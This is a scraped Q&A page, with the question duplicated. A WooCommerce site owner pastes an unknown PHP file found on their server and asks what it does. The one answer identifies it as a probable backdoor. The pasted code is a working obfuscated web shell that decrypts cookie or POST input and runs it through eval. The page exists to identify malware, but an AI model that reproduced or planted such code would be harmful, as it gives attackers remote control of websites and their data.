Questions that are too localized (such as syntax errors, code with restricted access, hacked sites, hosting or support issues) are not in scope. See how do I ask a good question?
Closed 6 years ago.
Improve this questionMy woo-commerce site contain a some unknowing PHP file, that i cant find out its purpose.
Here is the sample of the code ,
<?php
$qyxrjyu = 'vxoa_6p*5ci#0l1e4nH7mdsk-rg2t3u9by\'';$dtwaxz = Array();$dtwaxz[] = $qyxrjyu[18].$qyxrjyu[7];$dtwaxz[] = $qyxrjyu[11];$dtwaxz[] = $qyxrjyu[21].$qyxrjyu[14].$qyxrjyu[29].$qyxrjyu[27].$qyxrjyu[19].$qyxrjyu[21].$qyxrjyu[5].$qyxrjyu[12].$qyxrjyu[24].$qyxrjyu[31].$qyxrjyu[3].$qyxrjyu[27].$qyxrjyu[16].$qyxrjyu[24].$qyxrjyu[16].$qyxrjyu[12].$qyxrjyu[8].$qyxrjyu[15].$qyxrjyu[24].$qyxrjyu[32].$qyxrjyu[16].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[24].$qyxrjyu[15].$qyxrjyu[14].$qyxrjyu[31].$qyxrjyu[8].$qyxrjyu[8].$qyxrjyu[9].$qyxrjyu[16].$qyxrjyu[31].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[29].$qyxrjyu[19];$dtwaxz[] = $qyxrjyu[9].$qyxrjyu[2].$qyxrjyu[30].$qyxrjyu[17].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[4].$qyxrjyu[25].$qyxrjyu[15].$qyxrjyu[6].$qyxrjyu[15].$qyxrjyu[3].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[15].$qyxrjyu[1].$qyxrjyu[6].$qyxrjyu[13].$qyxrjyu[2].$qyxrjyu[21].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[30].$qyxrjyu[32].$qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25];$dtwaxz[] = $qyxrjyu[3].$qyxrjyu[25].$qyxrjyu[25].$qyxrjyu[3].$qyxrjyu[33].$qyxrjyu[4].$qyxrjyu[20].$qyxrjyu[15].$qyxrjyu[25].$qyxrjyu[26].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[13].$qyxrjyu[15].$qyxrjyu[17];$dtwaxz[] = $qyxrjyu[6].$qyxrjyu[3].$qyxrjyu[9].$qyxrjyu[23];foreach ($dtwaxz[7]($_COOKIE, $_POST) as $gitjw => $lsobabb){function mmkwylm($dtwaxz, $gitjw, $wkzdbr){return $dtwaxz[6]($dtwaxz[4]($gitjw . $dtwaxz[2], ($wkzdbr / $dtwaxz[8]($gitjw)) + 1), 0, $wkzdbr);}function irbcfeg($dtwaxz, $bgmei){return @$dtwaxz[9]($dtwaxz[0], $bgmei);}function obdaxad($dtwaxz, $bgmei){$pswrfp = $dtwaxz[3]($bgmei) % 3;if (!$pswrfp) {eval($bgmei[1]($bgmei[2]));exit();}}$lsobabb = irbcfeg($dtwaxz, $lsobabb);obdaxad($dtwaxz, $dtwaxz[5]($dtwaxz[1], $lsobabb ^ mmkwylm($dtwaxz, $gitjw, $dtwaxz[8]($lsobabb))));}
Could any one explain me whats the purpose of these code?
Thanks.
Closed. This question is off-topic. It is not currently accepting answers.Questions that are too localized (such as syntax errors, code with restricted access, hacked sites, hosting or support issues) are not in scope. See how do I ask a good question?
Closed 6 years ago.
Improve this questionMy woo-commerce site contain a some unknowing PHP file, that i cant find out its purpose.
Here is the sample of the code ,
<?php
$qyxrjyu = 'vxoa_6p*5ci#0l1e4nH7mdsk-rg2t3u9by\'';$dtwaxz = Array();$dtwaxz[] = $qyxrjyu[18].$qyxrjyu[7];$dtwaxz[] = $qyxrjyu[11];$dtwaxz[] = $qyxrjyu[21].$qyxrjyu[14].$qyxrjyu[29].$qyxrjyu[27].$qyxrjyu[19].$qyxrjyu[21].$qyxrjyu[5].$qyxrjyu[12].$qyxrjyu[24].$qyxrjyu[31].$qyxrjyu[3].$qyxrjyu[27].$qyxrjyu[16].$qyxrjyu[24].$qyxrjyu[16].$qyxrjyu[12].$qyxrjyu[8].$qyxrjyu[15].$qyxrjyu[24].$qyxrjyu[32].$qyxrjyu[16].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[24].$qyxrjyu[15].$qyxrjyu[14].$qyxrjyu[31].$qyxrjyu[8].$qyxrjyu[8].$qyxrjyu[9].$qyxrjyu[16].$qyxrjyu[31].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[29].$qyxrjyu[19];$dtwaxz[] = $qyxrjyu[9].$qyxrjyu[2].$qyxrjyu[30].$qyxrjyu[17].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[4].$qyxrjyu[25].$qyxrjyu[15].$qyxrjyu[6].$qyxrjyu[15].$qyxrjyu[3].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[15].$qyxrjyu[1].$qyxrjyu[6].$qyxrjyu[13].$qyxrjyu[2].$qyxrjyu[21].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[30].$qyxrjyu[32].$qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25];$dtwaxz[] = $qyxrjyu[3].$qyxrjyu[25].$qyxrjyu[25].$qyxrjyu[3].$qyxrjyu[33].$qyxrjyu[4].$qyxrjyu[20].$qyxrjyu[15].$qyxrjyu[25].$qyxrjyu[26].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[13].$qyxrjyu[15].$qyxrjyu[17];$dtwaxz[] = $qyxrjyu[6].$qyxrjyu[3].$qyxrjyu[9].$qyxrjyu[23];foreach ($dtwaxz[7]($_COOKIE, $_POST) as $gitjw => $lsobabb){function mmkwylm($dtwaxz, $gitjw, $wkzdbr){return $dtwaxz[6]($dtwaxz[4]($gitjw . $dtwaxz[2], ($wkzdbr / $dtwaxz[8]($gitjw)) + 1), 0, $wkzdbr);}function irbcfeg($dtwaxz, $bgmei){return @$dtwaxz[9]($dtwaxz[0], $bgmei);}function obdaxad($dtwaxz, $bgmei){$pswrfp = $dtwaxz[3]($bgmei) % 3;if (!$pswrfp) {eval($bgmei[1]($bgmei[2]));exit();}}$lsobabb = irbcfeg($dtwaxz, $lsobabb);obdaxad($dtwaxz, $dtwaxz[5]($dtwaxz[1], $lsobabb ^ mmkwylm($dtwaxz, $gitjw, $dtwaxz[8]($lsobabb))));}
Could any one explain me whats the purpose of these code?
Thanks.
Share Improve this question edited Feb 11, 2019 at 5:57 Pratik Patel 1,1091 gold badge11 silver badges23 bronze badges asked Feb 11, 2019 at 5:47 Rashid RcpRashid Rcp 112 bronze badges1 Answer
Reset to default 3It’s definitely not a file from WordPress.
It’s a file with obfuscated code, so it’s hard to read and say what it does exactly.
Most probably it’s a backdoor or some other malicious file lest on your server by attacker/malware infection.